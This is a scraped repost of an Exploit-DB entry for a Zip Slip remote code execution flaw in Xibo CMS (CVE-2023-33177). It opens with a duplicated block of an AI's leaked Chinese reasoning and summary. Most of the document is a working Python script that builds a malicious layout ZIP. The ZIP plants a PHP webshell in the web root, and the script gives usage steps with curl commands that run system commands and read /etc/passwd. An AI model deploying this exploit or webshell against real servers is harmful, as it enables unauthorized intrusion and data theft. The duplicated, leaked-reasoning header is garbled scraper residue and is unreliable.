[webapps] xibocms 3.3.4 - RCE
好的,我现在需要帮助用户总结一篇文章的内容,控制在100字以内。用户提供的文章是一个关于Xibo CMS漏洞的详细描述,包括漏洞名称、作者、影响版本、利用细节等。 首先,我需要理解文章的主要内容。这篇文章描述了一个远程代码执行漏洞(CVE-2023-33177),存在于Xibo CMS的某些版本中。漏洞是由于在导入布局时未能正确验证ZIP文件中的路径,导致路径遍历攻击(Zip Slip)。攻击者可以上传恶意文件到服务器的任意位置,进而获得远程代码执行的能力。 接下来,我需要提取关键信息:漏洞类型(路径遍历)、受影响版本、利用方法(通过ZIP文件中的mapping.json)、结果(上传webshell并执行命令)、修复建议(升级到指定版本)。 然后,我要将这些信息浓缩到100字以内,确保涵盖所有重要点:漏洞名称、影响范围、利用方式、攻击结果和修复措施。 最后,组织语言,确保简洁明了。例如:“Xibo CMS 3.3.4 存在路径遍历漏洞(CVE-2023-33177),允许攻击者通过导入恶意ZIP文件上传任意文件并执行代码。该漏洞源于mapping.json中未正确验证的文件路径。受影响版本包括1.8.0-2.3.16和3.0.0-3.3.4。建议升级至2.3.17+或3.3.5+修复。” 这样既涵盖了所有关键点,又符合字数限制。 </think> Xibo CMS 3.3.4 存在路径遍历漏洞(CVE-2023-33177),允许攻击者通过导入恶意ZIP文件上传任意文件并执行代码。该漏洞源于mapping.json中未正确验证的文件路径。受影响版本包括1.8.0-2.3.16和3.0.0-3.3.4。建议升级至2.3.17+或3.3.5+修复。 2026-4-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
好的,我现在需要帮助用户总结一篇文章的内容,控制在100字以内。用户提供的文章是一个关于Xibo CMS漏洞的详细描述,包括漏洞名称、作者、影响版本、利用细节等。 首先,我需要理解文章的主要内容。这篇文章描述了一个远程代码执行漏洞(CVE-2023-33177),存在于Xibo CMS的某些版本中。漏洞是由于在导入布局时未能正确验证ZIP文件中的路径,导致路径遍历攻击(Zip Slip)。攻击者可以上传恶意文件到服务器的任意位置,进而获得远程代码执行的能力。 接下来,我需要提取关键信息:漏洞类型(路径遍历)、受影响版本、利用方法(通过ZIP文件中的mapping.json)、结果(上传webshell并执行命令)、修复建议(升级到指定版本)。 然后,我要将这些信息浓缩到100字以内,确保涵盖所有重要点:漏洞名称、影响范围、利用方式、攻击结果和修复措施。 最后,组织语言,确保简洁明了。例如:“Xibo CMS 3.3.4 存在路径遍历漏洞(CVE-2023-33177),允许攻击者通过导入恶意ZIP文件上传任意文件并执行代码。该漏洞源于mapping.json中未正确验证的文件路径。受影响版本包括1.8.0-2.3.16和3.0.0-3.3.4。建议升级至2.3.17+或3.3.5+修复。” 这样既涵盖了所有关键点,又符合字数限制。 </think> Xibo CMS 3.3.4 存在路径遍历漏洞(CVE-2023-33177),允许攻击者通过导入恶意ZIP文件上传任意文件并执行代码。该漏洞源于mapping.json中未正确验证的文件路径。受影响版本包括1.8.0-2.3.16和3.0.0-3.3.4。建议升级至2.3.17+或3.3.5+修复。 2026-4-8 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
# Exploit Title: XiboCMS 3.3.4- Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps
"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.
# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell
# Vulnerability Chain:
# ZIP contains: library/../../web/shell.php
# Mapping.json: {"file": "../../web/shell.php", ...}
# Xibo reads: library/ + ../../web/shell.php
# Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
# Result: /var/www/cms/web/shell.php (webshell in web root!)
# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'
# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)
# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""
import zipfile
import json
import sys
def create_exploit():
"""Generate the malicious ZIP file for Xibo CMS RCE exploit"""
print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")
# Valid Xibo 3.0 layout structure
# This ensures the ZIP passes initial validation checks
layout_json = {
"layout": "Exploit Layout",
"description": "Path Traversal Test",
"layoutDefinitions": {
"schemaVersion": 3,
"width": 1920,
"height": 1080,
"backgroundColor": "#000000",
"backgroundzIndex": 0,
"code": "CVE-2023-33177",
"actions": [],
"regions": [],
"drawers": []
}
}
# Empty playlist - triggers JSON import code path
playlist_json = {}
# VULNERABILITY: Path traversal in mapping.json
# The 'file' field is not properly sanitized before file extraction
# Xibo constructs the extraction path as: library/temp/ + file['file']
# Using ../../ allows escaping the library directory
mapping_json = [{
"file": "../../web/shell.php", # Path traversal payload
"name": "shell.php",
"type": "module"
}]
# Simple PHP webshell for command execution
# Accepts commands via GET parameter: ?cmd=<command>
webshell = b'<?php system($_GET["cmd"]); ?>'
# Create the malicious ZIP file
try:
with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
# Add required Xibo layout files
zf.writestr('layout.json', json.dumps(layout_json, indent=2))
zf.writestr('playlist.json', json.dumps(playlist_json))
zf.writestr('mapping.json', json.dumps(mapping_json))
# CRITICAL: The file path in the ZIP must match what Xibo expects
# Xibo calls: $zip->getStream('library/' . $file['file'])
# Therefore we place the file at: library/../../web/shell.php
zf.writestr('library/../../web/shell.php', webshell)
print("[+] Exploit ZIP created successfully: exploit.zip")
print("\n[*] Exploitation Steps:")
print(" 1. Log in to Xibo CMS with valid credentials")
print(" 2. Navigate to: Design → Layouts → Import")
print(" 3. Upload exploit.zip")
print(" 4. Ignore any JSON errors (file is already written)")
print(" 5. Access webshell: http://<target>/shell.php?cmd=<command>")
print("\n[*] Example:")
print(" curl 'http://target/shell.php?cmd=id'")
print(" curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
print()
except Exception as e:
print(f"[-] Error creating exploit: {e}", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
create_exploit()
文章来源: https://www.exploit-db.com/exploits/52500
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh